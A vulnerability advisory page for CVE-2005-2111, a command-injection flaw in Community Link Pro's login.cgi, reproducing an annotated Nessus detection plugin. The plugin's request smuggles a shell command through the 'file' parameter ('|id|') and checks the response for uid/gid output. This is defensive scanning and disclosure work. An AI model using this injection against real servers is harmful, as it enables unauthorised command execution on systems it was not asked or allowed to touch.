Vulnerabilities > CVE-2005-2111 - Remote Security vulnerability in Community Link Pro Web Editor

047910
CVSS v2 base score 7.5 - HIGH (vector AV:N/AC:L/Au:N/C:P/I:P/A:P)
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
community-link-pro-web-editor
nessus

Summary

login.cgi in Community Link Pro Web Editor allows remote attackers to execute arbitrary commands via shell metacharacters in the file parameter.

Vulnerable Configurations

Part Description Count
Application
Community_Link_Pro_Web_Editor
1

Nessus

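NASL family: CGI abuses
NASL id: COMMUNITY_LINK_PRO_LOGIN_REMOTE_CMD_EXEC.NASL
description: The remote host is running Community Link Pro, a web-based application written in Perl. The remote version of this software fails to sanitize user input to the 'file' parameter of the 'login.cgi' script of shell metacharacters before using it to run a command. An unauthenticated attacker can leverage this issue to execute arbitrary commands on the remote host subject to the privileges under which the web server operates.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 19305
published: 2005-07-27
reporter: This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/19305
title: Community Link Pro login.cgi file Parameter Arbitrary Command Execution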
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration branch: when `description` is set the plugin only declares its
# metadata (identifiers, references, report text, scheduling constraints) and
# exits before any of the detection code further down is reached.
if (description)
{
 # Plugin identity and revision information.
 script_id(19305);
 script_version("1.15");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

 # External references tying this check to the advisory it covers.
 script_cve_id("CVE-2005-2111");
 script_bugtraq_id(14097);

 script_name(english:"Community Link Pro login.cgi file Parameter Arbitrary Command Execution");
 script_summary(english:"Checks for Community Link Pro webeditor login.cgi remote execution flaw");

 # Report text: short synopsis, then the full description of the flaw
 # (unsanitized shell metacharacters in the 'file' parameter of login.cgi).
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI script that allows arbitrary
command execution.");
 script_set_attribute(attribute:"description", value:
"The remote host is running Community Link Pro, a web-based
application written in Perl. 

The remote version of this software fails to sanitize user input to
the 'file' parameter of the 'login.cgi' script of shell metacharacters
before using it to run a command.  An unauthenticated attacker can
leverage this issue to execute arbitrary commands on the remote host
subject to the privileges under which the web server operates.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2005/Jun/265");
 # No fix is recorded by the plugin.
 # NOTE(review): with no fix listed, a finding from this check is normally
 # handled by removing the CGI or restricting access to it; confirm the
 # current vendor status before relying on this text.
 script_set_attribute(attribute:"solution", value:
"There is no known solution at this time.");
 # CVSS v2 base vector: network-reachable, low complexity, no authentication,
 # partial impact on confidentiality, integrity and availability.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 # CVSS v2 temporal vector: exploitability high (E:H), remediation level
 # unavailable (RL:U), report confidence not defined (RC:ND).
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");

 # The plugin was published roughly a month after the vulnerability itself.
 script_set_attribute(attribute:"plugin_publication_date", value:"2005/07/27");
 script_set_attribute(attribute:"vuln_publication_date", value:"2005/06/29");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 # Declared as ACT_ATTACK, which is consistent with the detection code below
 # sending a request that asks the target to run a command. Scan policies that
 # exclude attack-category plugins will therefore not run this check.
 script_category(ACT_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2005-2020 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");

 # Scheduling constraints: depends on http_version.nasl, lists
 # "Settings/disable_cgi_scanning" as an exclusion key, and names
 # "Services/www" and port 80 as the ports it requires.
 script_dependencie("http_version.nasl");
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_ports("Services/www", 80);

 # Registration is complete; nothing is tested in this branch.
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
include("http_keepalive.inc");
include("global_settings.inc");
# Ask get_http_port for the web port to test, with 80 as the default.
# embedded:TRUE presumably allows embedded web servers to be selected as well;
# confirm against http_func.inc.
port = get_http_port(default:80, embedded:TRUE);

# Stop without reporting when the selected port is not reported as open.
if(!get_port_state(port))exit(0);

# Delegate the check to the shared helper. The arguments visible here are:
#   check_request - the login.cgi request whose 'file' parameter carries the
#                   'id' command between pipe characters
#   check_result  - the pattern a response has to match; it corresponds to
#                   the uid=/gid= output of 'id'
#   command       - the command name, 'id'
#   extra_dirs    - an additional directory, /app/webeditor
# How the helper iterates directories and reports a finding is defined in the
# included files, not here. A response matching check_result means the server
# ran the command. In web-server access logs this check appears as a login.cgi
# request with pipe characters in the 'file' parameter, which is also the
# pattern to look for when reviewing logs for hostile use of the same flaw.
# NOTE(review): `port` is not passed to the helper in this call; confirm the
# helper resolves the port itself so that the state check above and the
# request refer to the same port.
http_check_remote_code_ka (
                        check_request:"/login.cgi?username=&command=simple&do=edit&password=&file=|id|",
                        check_result:"uid=[0-9]+.*gid=[0-9]+.*",
                        command:"id",
			extra_dirs:make_list("/app/webeditor")
                        );